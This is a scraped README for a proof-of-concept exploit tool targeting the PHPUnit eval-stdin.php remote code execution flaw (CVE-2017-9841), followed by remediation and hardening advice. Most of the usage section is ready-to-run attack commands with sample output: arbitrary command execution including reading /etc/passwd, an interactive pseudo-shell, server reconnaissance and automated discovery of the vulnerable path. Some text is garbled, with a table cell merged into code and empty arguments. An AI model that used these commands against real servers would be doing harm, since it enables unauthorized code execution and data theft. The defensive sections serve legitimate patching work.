Exploit for Code Injection in Phpunit_Project Phpunit CVE-2017-9841

## https://sploitus.com/exploit?id=3A214513-27F6-566A-A861-1A2241A825C8
# CVE-2017-9841 — PHPUnit Remote Code Execution (RCE) PoC

> **⚠️ DISCLAIMER:** This tool is intended **solely for educational purposes and authorized security testing**. Unauthorized use against systems you do not own or have explicit permission to test is **illegal**. The author assumes no liability for any misuse of this tool.

---

## Overview

**CVE-2017-9841** is a Remote Code Execution (RCE) vulnerability in the **PHPUnit** library affecting versions prior to **5.6.3** and **6.x prior to 6.4.2**.

The vulnerability exists in `src/Util/PHP/eval-stdin.php`, which executes PHP code received via `php://input` (POST body) using the `eval()` function. If this file is publicly accessible (e.g., within an unprotected `vendor/` directory), an attacker can execute arbitrary PHP code on the server without authentication.

### Vulnerability Details

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2017-9841 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected** | PHPUnit ' . file_get_contents('php://input'));
```

This file accepts **PHP code from the POST body** and immediately executes it via `eval()` without any authentication or validation.

---

## Installation

### Requirements

- Python 3.6+
- `requests` library

```bash
pip install requests
```

### Setup

```bash
git clone 
cd CVE-2017-9841
chmod +x poc_cve-2017-9841.py
```

---

## Usage

### Basic Syntax

```bash
python3 poc_cve-2017-9841.py -u  [options]
```

The `-u` flag accepts both a **base URL** (auto-appends the vulnerable path) or a **full URL** pointing directly to `eval-stdin.php`.

### 1. Vulnerability Check (No Command Execution)

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --check
```

**Output:**
```
[*] Target : https://target.com
[*] Endpoint: https://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

[*] Checking vulnerability on: ...
[+] File accessible (HTTP 200)
[+] VULNERABLE! Code execution confirmed.
[+] Response: VULN_CHECK_OK_2017_9841
```

### 2. Command Execution

```bash
# Single command
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'whoami'

# Multiple commands
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'id && hostname && uname -a'

# Read a file
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'cat /etc/passwd'

# Save output to file
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'cat /etc/passwd' -o result.txt
```

### 3. Server Information (Read-Only)

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --info
```

**Output:**
```
=== SERVER INFORMATION ===
PHP Version : 8.x.x
OS          : Linux
SAPI        : fpm-fcgi
User        : www-data
Hostname    : web-server-01
Server IP   : 192.168.1.100
CWD         : /var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP
Doc Root    : /var/www/html/
Server SW   : Apache
Memory Limit: 256M
Max Exec    : 30s
Open Basedir: (none)
Disabled Fn : (none)

=== DANGEROUS FUNCTIONS ===
  system: YES
  exec: YES
  passthru: YES
  shell_exec: YES
  proc_open: YES
  popen: YES
  curl_exec: YES
```

### 4. Interactive Pseudo-Shell

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --shell
```

**Output:**
```
[*] Pseudo-shell (type 'exit' or 'quit' to leave)
--------------------------------------------------
www-data@web-server-01$ whoami
www-data
www-data@web-server-01$ ls -la /var/www/html/
total 12
drwxr-xr-x 4 www-data www-data 4096 Jun 11 00:00 .
drwxr-xr-x 3 root     root     4096 Jan 01 00:00 ..
drwxr-xr-x 8 www-data www-data 4096 Jun 11 00:00 app
www-data@web-server-01$ exit
[*] Exiting shell.
```

### 5. Auto-Find Vulnerable Path

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --find-path
```

### 6. Custom Path

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' \
  --path '/custom/path/eval-stdin.php' -c 'whoami'
```

### 7. Full URL to eval-stdin.php

```bash
python3 poc_cve-2017-9841.py \
  -u 'https://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' \
  -c 'whoami'
```

### 8. Execute Raw PHP Code

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' \
  --php ''
```

---

## Options Reference

| Flag | Description |
|------|-------------|
| `-u, --url URL` | Target base URL or full URL to `eval-stdin.php` |
| `-c, --cmd CMD` | CLI command to execute on the target server |
| `--check` | Check if the target is vulnerable without executing commands |
| `--shell` | Open a pseudo-interactive shell |
| `--info` | Gather server information (read-only) |
| `--find-path` | Scan common paths to locate `eval-stdin.php` |
| `--path PATH` | Specify a custom path to `eval-stdin.php` |
| `--timeout N` | Request timeout in seconds (default: 30) |
| `-o, --output FILE` | Save command output to a file |
| `--php CODE` | Execute raw PHP code instead of system commands |

---

## Remediation

### Immediate Actions (Do This NOW)

#### 1. Delete the Vulnerable File

```bash
sudo rm /path/to/project/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```

#### 2. Block Access to the Vendor Directory

Add an `.htaccess` file inside the `vendor/` directory:

```apache
# /path/to/project/vendor/.htaccess
Deny from all
```

Or configure it in your Apache VirtualHost:

```apache

    Require all denied

```

For Nginx:

```nginx
location /vendor/ {
    deny all;
    return 403;
}
```

#### 3. Remove Dev Dependencies from Production

```bash
cd /path/to/project
composer install --no-dev --optimize-autoloader
```

### Short-Term Hardening

#### 4. Enable `disable_functions` in php.ini

```ini
; /etc/php/8.4/fpm/php.ini
disable_functions = system,exec,passthru,shell_exec,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
```

#### 5. Enable `open_basedir`

```ini
; /etc/php/8.4/fpm/php.ini or in VirtualHost
open_basedir = /var/www/html/project:/tmp
```

#### 6. Reduce `max_execution_time`

```ini
max_execution_time = 30
```

#### 7. Restart PHP-FPM

```bash
sudo systemctl restart php8.4-fpm
# or
sudo systemctl restart php-fpm
```

### Long-Term Hardening

#### 8. Upgrade PHPUnit

```bash
composer require --dev phpunit/phpunit:^10.0
composer update phpunit/phpunit
```

#### 9. Implement WAF Rules

ModSecurity example:

```
SecRule REQUEST_URI "eval-stdin\.php" \
    "id:1000001,phase:1,deny,status:403,msg:'CVE-2017-9841 Block'"

SecRule REQUEST_URI "/vendor/" \
    "id:1000002,phase:1,deny,status:403,msg:'Block vendor directory access'"
```

#### 10. CI/CD Pipeline Hardening

```yaml
# Example: GitHub Actions
- name: Install production dependencies only
  run: composer install --no-dev --optimize-autoloader

- name: Remove test files and vulnerable scripts
  run: |
    rm -rf vendor/phpunit
    rm -rf vendor/mockery
    rm -rf tests/
    find vendor -name "eval-stdin.php" -delete
```

---

## Attack Flow Diagram

```
                    ┌──────────────────────────────┐
                    │          Attacker            │
                    └──────────────┬───────────────┘
                                   │ POST (PHP code)
                                   ▼
┌─────────────────────────────────────────────────────────────┐
│                        Apache Server                        │
│  ┌───────────────────────────────────────────────────────┐  │
│  │  /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php  │  │
│  │                                                       │  │
│  │  eval('?>' . file_get_contents('php://input'));       │  │
│  │           ▲                                           │  │
│  └───────────┼───────────────────────────────────────────┘  │
│              │                                              │
│              ▼                                              │
│  ┌───────────────────────────────────────────────────────┐  │
│  │            Arbitrary Code Execution                   │  │
│  │                                                       │  │
│  │  - Read/Write files on the server                     │  │
│  │  - Access database credentials                        │  │
│  │  - Lateral movement to internal network               │  │
│  │  - Install backdoors / webshells                      │  │
│  │  - Privilege escalation                               │  │
│  └───────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────┘
```

---

## Aggravating Factors

The following conditions significantly increase the severity and exploitability of this vulnerability:

| Factor | Impact |
|--------|--------|
| `disable_functions` is empty | All PHP functions are available (`system`, `exec`, etc.) |
| `open_basedir` is not set | Attacker can read/write files across the entire filesystem |
| High `max_execution_time` | Attacker has more time per request for complex payloads |
| FFI extension loaded | Allows direct C function calls, bypassing PHP restrictions |
| Database extensions loaded | Direct database connections possible (mysqli, pgsql, etc.) |
| No WAF deployed | No request filtering or blocking |
| No IDS/IPS in place | No anomaly detection or alerting |
| Dev dependencies in production | Expands the attack surface unnecessarily |

---

## References

- [NVD - CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
- [PHPUnit GitHub Issue #2728](https://github.com/sebastianbergmann/phpunit/issues/2728)
- [Exploit-DB #43340](https://www.exploit-db.com/exploits/43340)
- [MITRE CVE](https://vulners.com/cve/CVE-2017-9841)

---

## License

This tool is provided for educational and authorized security testing purposes only.